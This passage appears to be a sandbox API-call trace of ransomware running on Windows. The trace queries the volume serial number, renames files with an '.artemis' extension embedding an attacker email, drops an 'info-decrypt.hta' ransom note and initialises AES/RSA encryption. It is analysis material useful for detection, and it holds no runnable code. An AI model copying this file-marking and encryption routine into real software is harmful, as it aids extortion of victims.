riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce5b0 | out: ppvObject=0x6bce5b0*=0x78109c) returned 0x0 [0148.593] WbemLocator:IRpcOptions:Query (in: This=0x78109c, pPrx=0x7810b4, dwProperty=2, pdwValue=0x6bce5d8 | out: pdwValue=0x6bce5d8) returned 0x80004002 [0148.594] WbemLocator:IUnknown:Release (This=0x78109c) returned 0x3 [0148.594] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x2 [0148.594] CoGetContextToken (in: pToken=0x6bceaf8 | out: pToken=0x6bceaf8) returned 0x0 [0148.594] CoGetContextToken (in: pToken=0x6bcea58 | out: pToken=0x6bcea58) returned 0x0 [0148.594] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x6bceb28*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bceb24 | out: ppvObject=0x6bceb24*=0x672ccec) returned 0x0 [0148.594] WbemLocator:IUnknown:AddRef (This=0x672ccec) returned 0x4 [0148.594] WbemLocator:IUnknown:Release (This=0x672ccec) returned 0x3 [0148.594] WbemLocator:IUnknown:Release (This=0x672ccec) returned 0x2 [0148.594] SysStringLen (param_1=0x0) returned 0x0 [0148.594] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bceebc | out: puCount=0x6bceebc*=0x0) returned 0x0 [0148.594] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bceeb8*=0x0, pszText=0x0 | out: puBuffLength=0x6bceeb8*=0x20, pszText=0x0) returned 0x0 [0148.594] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bceeb8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bceeb8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.594] CoGetContextToken (in: pToken=0x6bceb28 | out: pToken=0x6bceb28) returned 0x0 [0148.594] WbemLocator:IUnknown:AddRef (This=0x7810b4) returned 0x3 [0148.594] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce9bc | out: ppvObject=0x6bce9bc*=0x7810b4) returned 0x0 [0148.594] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x3 [0148.594] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x2 [0148.595] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bceec0*=0x0, pszText=0x0 | out: puBuffLength=0x6bceec0*=0x20, pszText=0x0) returned 0x0 [0148.595] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bceec0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bceec0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.595] IWbemServices:GetObject (in: This=0x672ccec, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bcee74*=0x0, ppCallResult=0x0 | out: ppObject=0x6bcee74*=0x673b2d0, ppCallResult=0x0) returned 0x0 [0148.847] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x6bcee74 | out: puCount=0x6bcee74*=0x2) returned 0x0 [0148.847] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=4, puBuffLength=0x6bcee70*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee70*=0xf, pszText=0x0) returned 0x0 [0148.847] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=4, puBuffLength=0x6bcee70*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcee70*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.847] IWbemClassObject:Get (in: This=0x673b2d0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcee70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34c1448*=0, plFlavor=0x34c144c*=0 | out: pVal=0x6bcee70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34c1448*=8, plFlavor=0x34c144c*=0) returned 0x0 [0148.847] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.847] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.847] IWbemClassObject:Get (in: This=0x673b2d0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcee78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34c1448*=8, plFlavor=0x34c144c*=0 | out: pVal=0x6bcee78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34c1448*=8, plFlavor=0x34c144c*=0) returned 0x0 [0148.847] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.848] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.848] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6bcea78, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0148.848] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6bcea78, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x47 [0148.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bceed8) returned 1 [0148.848] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x6bcef54 | out: lpFileInformation=0x6bcef54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0148.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bceed4) returned 1 [0148.848] MoveFileW (lpExistingFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), lpNewFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0148.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcf00c) returned 1 [0148.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files", nBufferLength=0x105, lpBuffer=0x6bceb14, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files", lpFilePart=0x0) returned 0x1d [0148.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\", nBufferLength=0x105, lpBuffer=0x6bceae8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\", lpFilePart=0x0) returned 0x1e [0148.849] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x6bced34 | out: lpFindFileData=0x6bced34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbd22b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd22b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b3b0 [0148.849] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbd22b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd22b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.850] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e0a00, ftCreationTime.dwHighDateTime=0x1d5caa0, ftLastAccessTime.dwLowDateTime=0xa9be8500, ftLastAccessTime.dwHighDateTime=0x1d5a644, ftLastWriteTime.dwLowDateTime=0xa9be8500, ftLastWriteTime.dwHighDateTime=0x1d5a644, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="alftp.exe", cAlternateFileName="")) returned 1 [0148.850] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0148.850] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0148.850] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a527150, ftCreationTime.dwHighDateTime=0x1d5949c, ftLastAccessTime.dwLowDateTime=0x8e158290, ftLastAccessTime.dwHighDateTime=0x1d56f0d, ftLastWriteTime.dwLowDateTime=0x8e158290, ftLastWriteTime.dwHighDateTime=0x1d56f0d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="omnipos.exe", cAlternateFileName="")) returned 1 [0148.850] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf5b140, ftCreationTime.dwHighDateTime=0x1d5c3fd, ftLastAccessTime.dwLowDateTime=0xa2abb830, ftLastAccessTime.dwHighDateTime=0x1d55efc, ftLastWriteTime.dwLowDateTime=0xa2abb830, ftLastWriteTime.dwHighDateTime=0x1d55efc, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="operamail.exe", cAlternateFileName="OPERAM~1.EXE")) returned 1 [0148.850] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0148.851] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0148.851] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0148.851] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0148.851] FindClose (in: hFindFile=0x77b3b0 | out: hFindFile=0x77b3b0) returned 1 [0148.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcefcc) returned 1 [0148.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcefd8) returned 1 [0148.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcf00c) returned 1 [0148.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files", nBufferLength=0x105, lpBuffer=0x6bceb14, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files", lpFilePart=0x0) returned 0x1d [0148.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\", nBufferLength=0x105, lpBuffer=0x6bceae8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\", lpFilePart=0x0) returned 0x1e [0148.852] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x6bced34 | out: lpFindFileData=0x6bced34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbd22b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd22b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b3b0 [0148.852] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbd22b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd22b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.852] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e0a00, ftCreationTime.dwHighDateTime=0x1d5caa0, ftLastAccessTime.dwLowDateTime=0xa9be8500, ftLastAccessTime.dwHighDateTime=0x1d5a644, ftLastWriteTime.dwLowDateTime=0xa9be8500, ftLastWriteTime.dwHighDateTime=0x1d5a644, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="alftp.exe", cAlternateFileName="")) returned 1 [0148.852] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0148.853] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0148.853] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a527150, ftCreationTime.dwHighDateTime=0x1d5949c, ftLastAccessTime.dwLowDateTime=0x8e158290, ftLastAccessTime.dwHighDateTime=0x1d56f0d, ftLastWriteTime.dwLowDateTime=0x8e158290, ftLastWriteTime.dwHighDateTime=0x1d56f0d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="omnipos.exe", cAlternateFileName="")) returned 1 [0148.853] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf5b140, ftCreationTime.dwHighDateTime=0x1d5c3fd, ftLastAccessTime.dwLowDateTime=0xa2abb830, ftLastAccessTime.dwHighDateTime=0x1d55efc, ftLastWriteTime.dwLowDateTime=0xa2abb830, ftLastWriteTime.dwHighDateTime=0x1d55efc, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="operamail.exe", cAlternateFileName="OPERAM~1.EXE")) returned 1 [0148.853] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0148.853] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0148.854] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0148.854] FindNextFileW (in: hFindFile=0x77b3b0, lpFindFileData=0x6bced44 | out: lpFindFileData=0x6bced44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.854] FindClose (in: hFindFile=0x77b3b0 | out: hFindFile=0x77b3b0) returned 1 [0148.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcefcc) returned 1 [0148.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcefd8) returned 1 [0148.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe", nBufferLength=0x105, lpBuffer=0x6bceacc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\alftp.exe", lpFilePart=0x0) returned 0x27 [0148.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe", nBufferLength=0x105, lpBuffer=0x6bceac4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\alftp.exe", lpFilePart=0x0) returned 0x27 [0148.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bceacc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0148.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcef2c) returned 1 [0148.854] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bcefa8 | out: lpFileInformation=0x6bcefa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0148.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef28) returned 1 [0148.855] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe", nBufferLength=0x105, lpBuffer=0x6bceac4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\alftp.exe", lpFilePart=0x0) returned 0x27 [0148.855] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bce96c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0148.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee60) returned 1 [0148.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x460 [0148.855] GetFileType (hFile=0x460) returned 0x1 [0148.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee5c) returned 1 [0148.855] GetFileType (hFile=0x460) returned 0x1 [0148.856] WriteFile (in: hFile=0x460, lpBuffer=0x35680bc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6bcef24, lpOverlapped=0x0 | out: lpBuffer=0x35680bc*, lpNumberOfBytesWritten=0x6bcef24*=0x1000, lpOverlapped=0x0) returned 1 [0148.857] WriteFile (in: hFile=0x460, lpBuffer=0x35680bc*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6bceef8, lpOverlapped=0x0 | out: lpBuffer=0x35680bc*, lpNumberOfBytesWritten=0x6bceef8*=0x557, lpOverlapped=0x0) returned 1 [0148.857] CloseHandle (hObject=0x460) returned 1 [0148.857] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe", nBufferLength=0x105, lpBuffer=0x6bcea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\alftp.exe", lpFilePart=0x0) returned 0x27 [0148.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bceef4) returned 1 [0148.857] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe" (normalized: "c:\\program files\\common files\\alftp.exe"), fInfoLevelId=0x0, lpFileInformation=0x35690d8 | out: lpFileInformation=0x35690d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e0a00, ftCreationTime.dwHighDateTime=0x1d5caa0, ftLastAccessTime.dwLowDateTime=0xa9be8500, ftLastAccessTime.dwHighDateTime=0x1d5a644, ftLastWriteTime.dwLowDateTime=0xa9be8500, ftLastWriteTime.dwHighDateTime=0x1d5a644, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0148.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bceef0) returned 1 [0148.857] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe", nBufferLength=0x105, lpBuffer=0x6bce934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\alftp.exe", lpFilePart=0x0) returned 0x27 [0148.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee28) returned 1 [0148.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\alftp.exe" (normalized: "c:\\program files\\common files\\alftp.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0148.858] GetFileType (hFile=0x460) returned 0x1 [0148.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee24) returned 1 [0148.858] GetFileType (hFile=0x460) returned 0x1 [0148.858] GetFileSize (in: hFile=0x460, lpFileSizeHigh=0x6bcef30 | out: lpFileSizeHigh=0x6bcef30*=0x0) returned 0x13a00 [0148.858] ReadFile (in: hFile=0x460, lpBuffer=0x3569260, nNumberOfBytesToRead=0x13a00, lpNumberOfBytesRead=0x6bceedc, lpOverlapped=0x0 | out: lpBuffer=0x3569260*, lpNumberOfBytesRead=0x6bceedc*=0x13a00, lpOverlapped=0x0) returned 1 [0148.859] CloseHandle (hObject=0x460) returned 1 [0148.859] CryptAcquireContextW (in: phProv=0x6bcee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bcee7c*=0x7a9178) returned 1 [0148.860] CryptGenRandom (in: hProv=0x7a9178, dwLen=0x10, pbBuffer=0x357cfb4 | out: pbBuffer=0x357cfb4) returned 1 [0150.809] CryptImportKey (in: hProv=0x7a9178, pbData=0x35b27b8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcee4c | out: phKey=0x6bcee4c*=0x77b4f0) returned 1 [0150.809] CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.809] CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.810] CryptDuplicateKey (in: hKey=0x77b4f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6bcee3c | out: phKey=0x6bcee3c*=0x77b1b0) returned 1 [0150.810] 